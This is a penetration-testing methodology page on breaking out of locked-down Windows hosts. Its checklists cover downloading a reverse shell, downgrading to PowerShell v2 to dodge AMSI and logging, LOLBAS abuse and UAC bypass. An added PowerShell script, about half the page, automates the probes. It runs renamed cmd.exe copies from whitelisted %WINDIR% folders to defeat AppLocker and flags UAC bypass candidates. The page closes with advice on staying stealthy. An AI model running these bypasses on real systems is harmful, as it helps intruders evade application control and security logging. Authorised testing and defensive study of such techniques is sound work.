Gained access to a locked-down host and need a way to escape the restricted shell?
Methodology
Gaining shell access
- Check which software you can access
- Try common binaries such as cmd, powershell, powershell_ise, ftp, etc.
- Try alternatives to powershell and cmd such as PowerShdll and
- Try commands in the Explorer address bar
- Check whether you can access Internet Explorer, Paint, Excel, File Explorer, etc. (any file dialog or "Open" button is a path to the file system)
- Check keyboard shortcuts
- Try to create a new file (use the malicious HTA file) or a new shortcut that points to an executable
- Load files from an SMB share and execute them
- Windows 10 - try the Cortana exploit
- Try copying powershell.exe or cmd.exe under a different name and running it (path-based AppLocker/SRP rules often allow anything under %WINDIR% and block only by name or location)
- Try to access \\127.0.0.1\c$
Once a shell is obtained
- Bypass PowerShell restrictions
- If it is PowerShell, try downloading a reverse shell and running it; if it is version 4 or later, check whether you can downgrade to PowerShell v2 (powershell.exe -Version 2, which needs .NET 3.5 installed), since the v2 engine has no constrained language mode, AMSI or script block logging
- Try PowerShell alternatives (nps, PowerShdll, etc.)
- Test whether you can execute commands via LOLBAS binaries
- Attempt a UAC bypass to gain administrative privileges
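The two checklists above are usually run by hand; the following triage script is an added example (not part of the original page or any referenced tool) that automates the parts that can be probed from an already-obtained PowerShell prompt: which common binaries start, whether a renamed copy of cmd.exe runs from user-writable locations, whether the \\127.0.0.1\c$ share is reachable, the PowerShell version and language mode, whether the v2 engine downgrade works, the effective AppLocker policy, which LOLBAS binaries are on disk, and whether the current token is an admin token that is only missing elevation (the UAC bypass case). The candidate writable directories and the LOLBAS list are assumptions chosen for illustration; the script avoids .NET method calls so it also runs under constrained language mode.

```powershell
# Added triage script (not from the original page). Run from the restricted
# PowerShell prompt; every probe is read-only except the renamed-cmd test,
# which copies cmd.exe into candidate directories and deletes it again.

$report = [ordered]@{}

# 1. Which common binaries can we start? AppLocker/SRP blocks surface from
#    Start-Process as "This program is blocked by group policy".
$probes = [ordered]@{
    'cmd.exe'            = '/c exit 0'
    'powershell.exe'     = '-NoProfile -Command exit 0'
    'powershell_ise.exe' = '-NoProfile'          # GUI, killed after launch
    'ftp.exe'            = '-?'
}
foreach ($bin in $probes.Keys) {
    try {
        $p = Start-Process -FilePath $bin -ArgumentList $probes[$bin] -WindowStyle Hidden -PassThru -ErrorAction Stop
        Start-Sleep -Milliseconds 500
        if (-not $p.HasExited) { Stop-Process -Id $p.Id -Force -ErrorAction SilentlyContinue }
        $report["run $bin"] = 'allowed'
    } catch {
        $report["run $bin"] = "blocked: $($_.Exception.Message)"
    }
}

# 2. Renamed copy of cmd.exe from locations that are commonly user-writable
#    (assumed candidates; the two under %WINDIR% matter because default
#    AppLocker path rules allow everything beneath it).
$candidates = "$env:TEMP", "$env:SystemRoot\Tasks", "$env:SystemRoot\System32\spool\drivers\color"
foreach ($dir in $candidates) {
    $dst = Join-Path $dir 'notepad.exe'   # cmd.exe under a harmless-looking name
    try {
        Copy-Item "$env:SystemRoot\System32\cmd.exe" $dst -ErrorAction Stop
        $p = Start-Process -FilePath $dst -ArgumentList '/c exit 0' -WindowStyle Hidden -PassThru -Wait -ErrorAction Stop
        $report["renamed cmd in $dir"] = "allowed (exit $($p.ExitCode))"
    } catch {
        $report["renamed cmd in $dir"] = "failed: $($_.Exception.Message)"
    } finally {
        Remove-Item $dst -ErrorAction SilentlyContinue
    }
}

# 3. Loopback admin share.
$report['\\127.0.0.1\c$ reachable'] = Test-Path '\\127.0.0.1\c$\Windows'

# 4. PowerShell environment: version, language mode, execution policy.
$report['PS version']       = $PSVersionTable.PSVersion.ToString()
$report['language mode']    = $ExecutionContext.SessionState.LanguageMode
$report['execution policy'] = Get-ExecutionPolicy

# 5. Can we downgrade to the v2 engine? Prints "2" if it starts; otherwise the
#    error about .NET 2.0/3.5 not being installed.
$v2 = & powershell.exe -Version 2 -NoProfile -NonInteractive -Command '$PSVersionTable.PSVersion.Major' 2>&1
$report['v2 engine'] = if ("$v2" -match '^2') { 'available' } else { "unavailable: $v2" }

# 6. AppLocker: enforcement only happens while AppIDSvc is running, and the
#    effective policy tells us which collections are enforced vs. audit-only.
$report['AppIDSvc'] = (Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue).Status
try {
    $pol = Get-AppLockerPolicy -Effective -ErrorAction Stop
    $report['AppLocker collections'] = ($pol.RuleCollections |
        ForEach-Object { "$($_.RuleCollectionType)=$($_.EnforcementMode)" }) -join ', '
} catch {
    $report['AppLocker collections'] = "not readable: $($_.Exception.Message)"
}

# 7. LOLBAS binaries present on disk (assumed list; presence is not permission,
#    but default AppLocker rules allow %WINDIR%, so these usually run).
$net    = "$env:SystemRoot\Microsoft.NET\Framework64\v4.0.30319"
$lolbas = 'mshta.exe','rundll32.exe','regsvr32.exe','certutil.exe','wmic.exe','cscript.exe' |
          ForEach-Object { "$env:SystemRoot\System32\$_" }
$lolbas += "$net\MSBuild.exe", "$net\InstallUtil.exe"
$report['LOLBAS present'] = ($lolbas | Where-Object { Test-Path $_ } | Split-Path -Leaf) -join ', '

# 8. UAC bypass candidate: member of Administrators (S-1-5-32-544) but running
#    at medium integrity, i.e. high integrity SID S-1-16-12288 is absent.
$groups = whoami /groups
$report['Administrators member'] = [bool]($groups -match 'S-1-5-32-544')
$report['high integrity']        = [bool]($groups -match 'S-1-16-12288')
$report['UAC bypass worth trying'] = $report['Administrators member'] -and -not $report['high integrity']

[pscustomobject]$report | Format-List
```

Read the output top to bottom in the same order as the checklists: a blocked cmd.exe but an allowed renamed copy under %WINDIR%\Tasks means the restriction is a path or name rule rather than a publisher or hash rule; "language mode: ConstrainedLanguage" with "v2 engine: available" means the downgrade is the quickest bypass; an AppLocker policy that is readable but whose AppIDSvc is stopped is not being enforced at all. Copying into the candidate directories leaves an event trail (and a 4688/8003-style log on hardened hosts), so clean up and keep the probe count low on engagements where stealth matters.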
Table of Contents:
AppLocker
PowerShell constrained language mode bypass
Alternatives to the command prompt